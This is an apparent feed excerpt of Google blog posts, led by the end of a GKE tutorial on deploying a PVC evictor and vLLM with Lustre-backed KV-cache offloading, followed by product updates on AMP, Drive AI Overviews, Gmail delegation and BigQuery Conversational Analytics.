&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline; color: #5f6368;"&gt;&lt;span style="vertical-align: baseline;"&gt;PVC Evictor Deployment Steps&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The PVC Evictor is deployed via Helm using the chart located in &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;kv_connectors/pvc_evictor/helm&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline; color: #5f6368;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 5a: Create a Dedicated Node Pool for the Evictor&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Running the evictor at high scale requires significant CPU and memory. First, create a dedicated node pool using a high-performance machine type (such as c4-standard-16) to accommodate the 12 CPU and 8Gi memory requests needed per pod.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Create a dedicated node pool for the PVC Evictor\r\ngcloud container node-pools create evictor-pool \\\r\n    --location=&amp;quot;$ZONE&amp;quot; \\\r\n    --cluster=&amp;quot;$CLUSTER_NAME&amp;quot; \\\r\n    --project=&amp;quot;$PROJECT_ID&amp;quot; \\\r\n    --machine-type=&amp;quot;c4-standard-16&amp;quot; \\\r\n    --num-nodes=&amp;quot;1&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017d60&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p style="padding-left: 40px;"&gt;&lt;strong&gt;&lt;span style="color: #5f6368;"&gt;Step 5b: Install via Helm (High-Performance Configuration)&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy a scaled, high-performance evictor pool with 2 replicas to monitor lustre-pvc. This configuration uses 16 crawler processes per pod to handle massive file namespaces.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Note on Security Contexts&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;:  To allow the evictor pod to delete files created by vLLM, it must run with matching security context IDs. Ensure the placeholders &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;&amp;lt;YOUR_NON_ROOT_GID&amp;gt;&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;&amp;lt;YOUR_NON_ROOT_UID&amp;gt;&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; exactly match the non-root values used in the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;securityContext&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; of your vLLM deployment to ensure shared POSIX file permissions.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;git clone --depth 1 https://github.com/llm-d/llm-d-kv-cache.git\r\ncd llm-d-kv-cache/kv_connectors/pvc_evictor\r\n\r\nhelm install pvc-evictor ./helm \\\r\n  --namespace default \\\r\n  --set replicaCount=1 \\\r\n  --set config.numCrawlerProcesses=16 \\\r\n  --set config.deletionBatchSize=5000 \\\r\n  --set config.fileQueueMinSize=1000000 \\\r\n  --set config.fileQueueMaxsize=2000000 \\\r\n  --set config.fileAccessTimeThresholdMinutes=10 \\\r\n  --set securityContext.container.runAsNonRoot=false \\\r\n  --set pvc.name=&amp;quot;lustre-pvc&amp;quot; \\\r\n  --set config.cleanupThreshold=85.0 \\\r\n  --set config.targetThreshold=70.0 \\\r\n  --set config.cacheDirectory=&amp;quot;llmd-kv-cache&amp;quot; \\\r\n  --set securityContext.pod.fsGroup=&amp;lt;YOUR_NON_ROOT_GID&amp;gt; \\\r\n  --set securityContext.container.runAsUser=&amp;lt;YOUR_NON_ROOT_UID&amp;gt; \\\r\n  --set resources.requests.cpu=12 \\\r\n  --set resources.requests.memory=8Gi \\\r\n  --set resources.limits.cpu=15 \\\r\n  --set resources.limits.memory=16Gi \\\r\n  --set nodeSelector.&amp;quot;cloud\\.google\\.com/gke-nodepool&amp;quot;=evictor-pool \\\r\n  --set securityContext.pod.seLinuxOptions.level=&amp;quot;s0:c0\\,c1&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017eb0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="color: #5f6368;"&gt;Critical Parameters Explained:&lt;/span&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code style="vertical-align: baseline;"&gt;replicaCount=2&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Deploys 2 evictor pods. The Helm chart automatically configures sharding (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;totalShards=2&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) when multiple replicas are used.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;code style="vertical-align: baseline;"&gt;config.numCrawlerProcesses=16&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Runs 16 parallel crawler threads per pod to scan the filesystem rapidly.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;config.deletionBatchSize=5000&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Deletes files in batches of 5000 to reduce metadata overhead.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;config.fileQueueMinSize&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &amp;amp; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;config.fileQueueMaxsize&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Configures large memory queues (1M min, 2M max) to buffer files for deletion, matching the high crawler throughput.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;config.fileAccessTimeThresholdMinutes=10&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Aggressively evicts files that haven't been accessed in the last 10 minutes when the cleanup threshold is triggered.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;securityContext.container.runAsNonRoot=false&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Required if the evictor needs root-like permissions to manage/delete files across different user ownerships on the shared storage.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;resources.requests&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &amp;amp; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;limits&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Allocates 12-15 CPUs and 8-16Gi of memory per pod to ensure the high number of crawler processes do not get CPU-throttled or run Out-Of-Memory (OOM).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;strong&gt;&lt;span style="color: #5f6368;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 5c: Verify and Monitor&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Verify pod status\r\nkubectl get pods -l app.kubernetes.io/name=pvc-evictor -n default&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017c40&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Step 6: Clean Up&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because this deployment provisions significant and high-cost hardware, be sure to clean up your environment when you are done to avoid unnecessary charges.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Bash&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;helm uninstall pvc-evictor &amp;amp;&amp;amp; kubectl delete -f vllm-lustre-deployment.yaml\r\n\r\nkubectl delete pvc lustre-pvc\r\n\r\n# Delete the cluster (this also deletes the associated node pools)\r\ngcloud container clusters delete &amp;quot;$CLUSTER_NAME&amp;quot; \\\r\n    --zone &amp;quot;$ZONE&amp;quot; \\\r\n    --project &amp;quot;$PROJECT_ID&amp;quot; \\\r\n    --quiet\r\n\r\n# Note: The Lustre StorageClass reclaimPolicy is set to Delete, \r\n# so destroying the PVC or Cluster will automatically clean up the underlying Lustre storage.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017dc0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Appendix: Reference Configuration for Llama-3.3-70B Benchmark&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The following configuration is a representation of the deployment manifest used to generate the Llama-3.3-70B benchmark results referenced in this post. It is provided for completeness and transparency.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Note: This configuration utilizes an earlier iteration of the software stack (vLLM v0.15.0) and specific infrastructure flags that were active in the benchmarking environment at the time the data was collected.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: apps/v1\r\nkind: Deployment\r\nmetadata:\r\n  name: vllm-storage\r\n  namespace: default\r\n  labels:\r\n    app: vllm-storage\r\nspec:\r\n  replicas: 1\r\n  selector:\r\n    matchLabels:\r\n      app: vllm-storage\r\n  template:\r\n    metadata:\r\n      labels:\r\n        app: vllm-storage\r\n    spec:\r\n      volumes:\r\n      - name: lustre-storage\r\n        persistentVolumeClaim:\r\n          claimName: lustre-pvc\r\n      - name: shm\r\n        emptyDir:\r\n          medium: Memory\r\n          sizeLimit: &amp;quot;200Gi&amp;quot;\r\n      - name: kv-store-disk\r\n        persistentVolumeClaim:\r\n          claimName: lustre-pvc\r\n      containers:\r\n      - name: vllm-storage\r\n        image: vllm/vllm-openai:v0.15.0\r\n        command:\r\n        - &amp;quot;/bin/bash&amp;quot;\r\n        args:\r\n        - &amp;quot;-c&amp;quot;\r\n        - |\r\n           pip install https://raw.githubusercontent.com/kfirtoledo/llm-d-kv-cache-manager/connector/kv_connectors/llmd_fs_backend/wheels/llmd_fs_connector-0.1.0-cp312-cp312-linux_x86_64.whl; \\\r\n           mkdir -p /tmp/prometheus_metrics;\r\n           export PROMETHEUS_MULTIPROC_DIR=/tmp/prometheus_metrics; \\\r\n           vllm serve meta-llama/Llama-3.3-70B-Instruct \\\r\n           --download-dir /model/models \\\r\n           --load-format runai_streamer \\\r\n           --kv-transfer-config \&amp;#x27;{ \r\n                &amp;quot;kv_connector&amp;quot;: &amp;quot;OffloadingConnector&amp;quot;, \r\n                &amp;quot;kv_role&amp;quot;: &amp;quot;kv_both&amp;quot;,\r\n                &amp;quot;kv_connector_extra_config&amp;quot;: {\r\n                  &amp;quot;spec_name&amp;quot;: &amp;quot;SharedStorageOffloadingSpec&amp;quot;,\r\n                  &amp;quot;spec_module_path&amp;quot;: &amp;quot;llmd_fs_backend.spec&amp;quot;,\r\n                  &amp;quot;shared_storage_path&amp;quot;: &amp;quot;/mnt/files-storage/llmd-kv-cache/&amp;quot;,\r\n                  &amp;quot;block_size&amp;quot;: 1024,\r\n                  &amp;quot;threads_per_gpu&amp;quot;: &amp;quot;64&amp;quot;\r\n                }\r\n              }\&amp;#x27; \\\r\n           --distributed_executor_backend &amp;quot;mp&amp;quot; \\\r\n           --port 8000 \\\r\n           --max_num_batched_tokens 16384 \\\r\n           --enable-chunked-prefill \\\r\n           --tensor-parallel-size 8 \\\r\n           --enable_prefix_caching \\\r\n           --gpu-memory-utilization 0.9\r\n        env:\r\n        - name: HUGGING_FACE_HUB_TOKEN\r\n          valueFrom:\r\n            secretKeyRef:\r\n              name: hf-token-secret\r\n              key: token\r\n        - name: VLLM_EXECUTE_MODEL_TIMEOUT_SECONDS\r\n          value: &amp;quot;3000&amp;quot;\r\n        - name: PYTHONHASHSEED\r\n          value: &amp;quot;123&amp;quot;\r\n        ports:\r\n        - containerPort: 8000\r\n        resources:\r\n          limits:\r\n            nvidia.com/gpu: &amp;quot;8&amp;quot;\r\n          requests:\r\n            cpu: &amp;quot;200&amp;quot;\r\n            memory: 1024G\r\n            ephemeral-storage: 5120Gi\r\n            nvidia.com/gpu: &amp;quot;8&amp;quot;\r\n        volumeMounts:\r\n        - name: lustre-storage\r\n          mountPath: /model\r\n        - mountPath: /root/.cache/huggingface\r\n          name: lustre-storage\r\n          subPath: huggingface-cache\r\n        - name: shm\r\n          mountPath: /dev/shm\r\n        - mountPath: /mnt/files-storage\r\n          name: kv-store-disk\r\n        # ... probes omitted for brevity ...&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017a60&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/scaling-llm-inference-multi-node-kv-cache-offloading-with-gke-managed-lustre" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-01T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/search/updates#july-2026</id>
    <title>Updating our AMP documentation</title>
    <updated>2026-07-01T00:00:00+00:00</updated>
    <content type="html">&lt;p&gt;
          &lt;b&gt;What&lt;/b&gt;: Simplified our &lt;a href="https://developers.google.com/search/docs/crawling-indexing/amp"&gt;AMP documentation&lt;/a&gt; by removing outdated references to the AMP viewer, AMP Cache, and signed exchange.
        &lt;/p&gt;&lt;p&gt;
          &lt;b&gt;Why&lt;/b&gt;: Starting today, Google Search is updating how it connects users to AMP pages,
          and will now take users directly to the publisher's AMP host pages. This change simplifies
          and reduces maintenance efforts for publishers who are creating AMP content, as they no
          longer need to update the AMP cache or configure signed exchanges. AMP content will
          continue to rank just like any other web page.
        &lt;/p&gt;</content>
    <link href="https://developers.google.com/search/updates#july-2026" rel="alternate"/>
    <category term="Search Central Docs"/>
    <published>2026-07-01T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/products/gemini-app/gemini-spark-updates-june-2026</id>
    <title>Gemini Spark updates: macOS launch, connected apps and more</title>
    <updated>2026-06-30T21:00:00+00:00</updated>
    <content type="html">Example spark task "Monitor interior design internships for this summer"</content>
    <link href="https://blog.google/innovation-and-ai/products/gemini-app/gemini-spark-updates-june-2026" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-30T21:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/ai-overviews-in-drive-now-available-on-mobile.html</id>
    <title>AI Overviews in Drive now available on mobile</title>
    <updated>2026-06-30T19:55:27+00:00</updated>
    <content type="html">&lt;p&gt;In April, we announced the &lt;a href="https://workspaceupdates.googleblog.com/2026/04/ai-overviews-in-drive-now-generally-available.html" target="_blank"&gt;general availability for Drive AI Overviews in Drive&lt;/a&gt; on the web. We’re now bringing this feature to the Drive Android and iOS apps.&lt;/p&gt;&lt;p&gt;Instead of searching through endless files and opening dozens of tabs to find the information you need, you can now get instant answers right at the top of your search results. Gemini does the heavy lifting for you, scanning your documents to provide clear, reliable summaries.&lt;/p&gt;&lt;p&gt;Here is how it helps you work smarter:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;See the big picture: &lt;/b&gt;Get a quick summary of information pulled from multiple files without needing to open each one.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Ask naturally:&lt;/b&gt; There’s no need to use complicated search tricks. Just ask a question as you would to a colleague, like "What’s in our Spring 2026 catalog?"&lt;/li&gt;&lt;li&gt;&lt;b&gt;Get the right answer:&lt;/b&gt; Gemini automatically understands what you’re looking for, whether it’s a quick fact, a project summary, or a list of specific documents, and adjusts its response to match.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Dig deeper with ease:&lt;/b&gt; If you need more information, you can go from a quick summary to a deeper conversation with Ask Gemini in just one click.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Control your AI Overviews scope:&lt;/b&gt; Use AI Overview search settings to choose which Google Workspace apps Gemini uses to find files and generate AI Overviews.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;This feature will roll out in English and an additional 28 languages (&lt;a href="https://support.google.com/docs/answer/14925782#zippy=%2Cgemini-in-drive-side-panel" target="_blank"&gt;the same as those supposed for Gemini in Drive side panel&lt;/a&gt;) over the next several weeks.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; This feature is available by default if &lt;a href="https://knowledge.workspace.google.com/admin/gemini/manage-access-to-gemini-features-in-workspace-services" target="_blank"&gt;Gemini for Workspace in Drive is enabled&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;You must have &lt;a href="https://support.google.com/mail/answer/15604322?sjid=17363988672514456782-NA#gw&amp;amp;zippy=%2Csmart-features-in-google-workspace%2Cwhat-are-googles-legal-bases-of-processing-for-users-in-the-european-economic-area-united-kingdom-or-switzerland%2Chow-long-is-your-workspace-content-activity-used-to-provide-smart-features-and-to-improve-these-features" target="_blank"&gt;Workspace smart features&lt;/a&gt; enabled to use AI Overviews in Drive. Visit the Help Center to learn more about &lt;a href="https://support.google.com/drive/answer/16685111" target="_blank"&gt;getting answers directly in Drive search&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid and Scheduled Release domains:&lt;/a&gt; Extended rollout (potentially longer than 15 days for feature visibility) started on June 26, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer:&lt;/b&gt; Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;AI Add-ons: &lt;/b&gt;Google AI Pro for Education&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Help: &lt;a href="https://support.google.com/drive/answer/16685111" target="_blank"&gt;Search &amp;amp; retrieve your files in Drive with Gemini&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/ai-overviews-in-drive-now-available-on-mobile.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-30T19:55:27+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/work-with-delegated-gmail-accounts-from-mobile-devices.html</id>
    <title>Work with delegated Gmail accounts from mobile devices</title>
    <updated>2026-06-30T18:26:46+00:00</updated>
    <content type="html">Previously, users could only work with delegated Gmail accounts through the web interface. We are updating the Gmail app for iOS and Android to allow delegates to read, manage, and compose emails on behalf of a delegator directly from their mobile devices.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This update removes a significant barrier for employees who rely on mobile devices for their daily productivity. For example, an administrative assistant can seamlessly handle urgent communications for an executive while away from the office, without needing to find a desktop computer.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;When using the Gmail mobile app, delegates can now:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Switch between their own inbox and delegated accounts.&lt;/li&gt;&lt;li&gt;View unread message counts for delegated inboxes from the account menu.&lt;/li&gt;&lt;li&gt;See emails intermingled across delegated accounts and their own account using the mobile “All inboxes” view.&lt;/li&gt;&lt;li&gt;Send messages that allow recipients to view the specific "sent by" information in the mobile experience.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Administrators retain full control over delegation settings, including the ability to restrict delegation to specific organizational units. The mobile experience adheres to existing delegation policies and limits, such as supporting up to 1,000 unique delegates per account and 40 concurrent users. Delegators do not need to perform any additional setup to enable mobile access for their existing delegates.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this specific mobile feature; it follows &lt;a href="https://knowledge.workspace.google.com/admin/users/delegate-a-users-email-address" target="_blank"&gt;existing delegation settings&lt;/a&gt; that you’ve configured for the web experience.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;To access a delegated account, ensure you have first been granted access via the Gmail web settings. Once granted, tap your profile picture in the Gmail app on Android or iOS and select the delegated account from the list.&amp;nbsp;Visit the Help Center to &lt;a href="https://support.google.com/mail/answer/138350" target="_blank"&gt;learn more about delegating and collaborating on email&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt;&amp;nbsp;Rolling out now with expected completion by July 8, 2026 (Android), and July 29, 2026 (iOS)&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available in early July to all Google Workspace customers, Workspace Individual subscribers, and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/gmail/let-users-delegate-access-to-a-gmail-account" target="_blank"&gt;Let users delegate access to a Gmail account&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Help: &lt;a href="https://support.google.com/mail/answer/138350" target="_blank"&gt;Delegate and collaborate on email&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/work-with-delegated-gmail-accounts-from-mobile-devices.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-30T18:26:46+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/conversational-analytics-in-bigquery-now-ga</id>
    <title>Conversational analytics in BigQuery brings trusted agentic reasoning to everyone</title>
    <updated>2026-06-30T18:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Businesses run on fast decisions, but the teams who hold the answers are often buried under a backlog of routine requests, leaving users waiting in line for insights they need now. Today, we are bringing Conversational Analytics in BigQuery to general availability, so both business and technical teams can query data, run multi-step analyses, and generate visual reports using natural language, right where the data lives. With this release, Conversational Analytics in BigQuery now delivers an agent that behaves like an analyst who knows your business, thinks before it answers, and stands behind its work. Built on Google’s latest Gemini models and BigQuery’s secure, governed foundation, it brings that trusted analyst to everyone in your organization.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/1_mFIzbUM.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Fig 1. Conversational Analytics in BigQuery&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Conversational analytics for enterprise data&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;BigQuery’s conversational capabilities are built-in and available for use instantly, with no setup required.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For deeper, more consistent insights, data professionals can author specialized agents grounded in the exact sources that matter, from projects, datasets, and tables to views, graphs, and user-defined functions. And because your data rarely lives in one place, Conversational Analytics reaches beyond native BigQuery tables to Lakehouse-managed Apache Iceberg tables and cross-cloud Lakehouse sources like Databricks Unity, AWS Glue, SAP and Salesforce, so you can break down data silos and analyze data across clouds from a single conversation. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a data practitioner, you work with Conversational Analytics right inside BigQuery Studio and Data Canvas, and publish the agents you build to Gemini Enterprise, Data Studio, or your own application through the Conversational Analytics API, putting them in the hands of business users wherever they work.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
